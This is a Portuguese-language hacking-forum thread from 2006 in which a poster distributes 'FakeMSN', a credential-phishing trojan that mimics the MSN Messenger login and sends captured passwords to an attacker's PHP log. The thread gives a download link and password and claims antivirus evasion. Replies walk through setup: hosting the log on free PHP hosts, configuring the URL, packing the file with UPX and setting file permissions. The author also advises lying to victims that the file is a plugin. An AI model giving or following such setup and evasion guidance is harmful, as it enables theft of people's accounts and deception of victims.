Fake MSN

Iniciado por whit3_sh4rk, 05 de Fevereiro , 2006, 12:03:19 PM

tópico anterior - próximo tópico

whit3_sh4rk

Bom, essa ferramenta, ao ser executada, fecha o MSN Messenger e simula uma tela de login. Ao digitar os dados e clicar em "entrar", os dados serão enviados para a URL que você especificar e logar no arquivo fakemsn.txt.

Arquivos inclusos:
Editor.exe
fakemsn.exe
leia.txt
logs/fakemsn.php
logs/fakemsn.txt
Pack.bat
UPX.exe

Download
Senha: lol

Obs: É uma ferramenta indetectável pelos antivírus.
Meu Kaspersky está extremamente atualizado e não foi encontrado nada.
Peço para que não mandem para VirusTotal ou semelhantes.

Se quiserem testar em vcs mesmos, não se preocupem, o arquivo não tem nenhum código malicioso, e só faz o descrito acima.

[]s

Anonymous

Também da para configurar para enviar para 1 website ou computador remoto? vlw
Edit: Dscp cara.. n tinha ainda tirado o programa. Tirei e dp li o read me e vi q dava.. bgd na mm..

whit3_sh4rk

Citação de: "Leia.txt"    AlphaVille FakeMSN por whit3_sh4rk

Os arquivos da pasta log terão que ser
 hospedados em um servidor que suporte PHP

Use o EDITOR para configurar a URL onde
 estará o log(fakemsn.php).

Após hospedado e configurado o FakeMSN,
 execute o pack.bat para que o arquivo
 seja compactado.

Obs: Ao ser configurado o arquivo, é
 criado criado uma cópia do original
 com o nome de fakemsn.bkp

whit3_sh4rk

[]s

Anonymous

fffteam

exelente!!! mas onde e como criar e ver os logs em php
poderia ajudar

whit3_sh4rk

Você baixou?
Não tem segredo.. hospede o fakemsn.php e fakemsn.txt em um servidor com suporte PHP.
Use o Editor pra configurar a URL que você hospedou.(Ex: www.meuslog.com/fakemsn.php).
Se quiser(recomendável), compacte o executável fakemsn.exe após a edição.

Pronto..

[]s

Anonymous

vc por acaso n tem alguns links de alguns servidores gratis com suporte a php tem? vlw

Anonymous

Citação de: "Azpelds"vc por acaso n tem alguns links de alguns servidores gratis com suporte a php tem? vlw

Amigos, é o meu 1º post aqui no darkers, e começo por ajudar aqui este colega...

http://www.orgfree.com/ -> Aqui encontras o que precisas  ;)

Obs: whit3_sh4rk mais uma vez, parabens pelo programa...

fffteam

Você baixou?
Não tem segredo.. hospede o fakemsn.php e fakemsn.txt em um servidor com suporte PHP.
Use o Editor pra configurar a URL que você hospedou.(Ex: www.meuslog.com/fakemsn.php).
Se quiser(recomendável), compacte o executável fakemsn.exe após a edição.

Pronto..

[]s

no orgfree não entendo como ver os logs os arquivos foram colocados dentro do servidor mas
diz página não encontrada tem que usar o ftp para ver os logs poque de outro jeito não funciona.
explica como usar isso no orgfree.com porque diz pagina não encontrada

Anonymous

Amigo fffteam, é o seguinte, nao sei se o seu problema é o mesmo que uma vez tive e que o colega whit3_sh4rk me ajudou a resolver, mas vamos lá:

1º- hospedas os ficheiros fakemsn.txt e fakemsn.php na tua conta do orgfree.org, e vai ficar assim

http://*teudominio".com/fakemsn.php
http://*teudominio.com/fakemsn.txt

2º- tens que ir la ao "painel de" controlo da tua conta e tens que selecionar o fakemsn.txt e ir a set permission...

Tens que ficar com algo identico a isto...

Mais alguma duvida diz ;)

Anonymous

Olá!

Se alguém puder me auxiliar, eu não estou conseguindo modificar o  caminho dos logas como especifika o Leia.txt, pois o Editor.com além de ser vírus como AVG avisa, ele nãoi pode ser executado...

Obrigado!

DarkGenesis

whit3_sh4rk

[Verde]
Editor.com? O que vem é o Editor.exe.. E o AVG está detectando???  >:(
Me fale qual o nome que fala.. Provavelmente o pessoal não ouviu e alguns devem ter mandado para virustotal & cia..

[]s

Anonymous

Amigo White Olá,

Bom, O programa ficou Show!..Apenas alguns detalhes são importantes para se ter sucesso.

O tamanho do aplicativo está errada
Não é possivel marcar as opções como Lembrar minha senha, lembrar meu e-mail
Não é possivel abrir os Status, como ocupado (Antes de Logar)
Não é possivel aumentar o tamanho do aplicativo
O botão maximizar está desabilitado
Uso o Karpersky 6 e já foi reconhecido por ele, atualização em dia.

Creio que algumas dessas correções quando feitas, podem resultar em maiores beneficios.

Mas não deixa de ser excelente.

Bye...

SmiTh

whit3_sh4rk

[SmiTh]
CitarO tamanho do aplicativo está errada
Não é possivel marcar as opções como Lembrar minha senha, lembrar meu e-mail
Não é possivel abrir os Status, como ocupado (Antes de Logar)
Não é possivel aumentar o tamanho do aplicativo
O botão maximizar está desabilitado
Uso o Karpersky 6 e já foi reconhecido por ele, atualização em dia.

Lembrar senha, email, mudar o status antes de entrar, maximizar o aplicativo, etc.. Eu optei por não fazer, pois para o meu objetivo não era necessário tanta coisa.. e o no caso do tamanho, não precisa ser idêntico, pode falar pra vítima que é um patch/plugin/addon ou coisa do tipo. Na maioria dos casos não necessita que seja 100% igual o MSN pq esses detalhes citados acima não são mtos que fazem.. e a pessoa iria testar na hora, num iria ficar clicando em tudo, etc.. Eu obtive sucesso no meu uso, pois fiz com um objetivo aí, pq senha de MSN não é mto interessante, a não ser que tenha bons motivos para tê-la.
No caso do Kaspersky, eu atualizei o meu agora, passei e só encontrou algo no Editor.exe, detectou como:
Trojan-PSW.Win32.FakeMSN.b
Já o fakemsn.exe o arquivo que é enviado para vítima passou batido.. Eu não pretendo dar nenhuma melhorada nesse, até porque como disse acima meu objetivo ja foi alcançado, ae já que tinha ficado legal, eu resolvi compartilhar, e também pq o MSN 8.0 em breve estará reinando ae.. Quem sabe eu não faço um Fake do 8.0  ;D.

[]s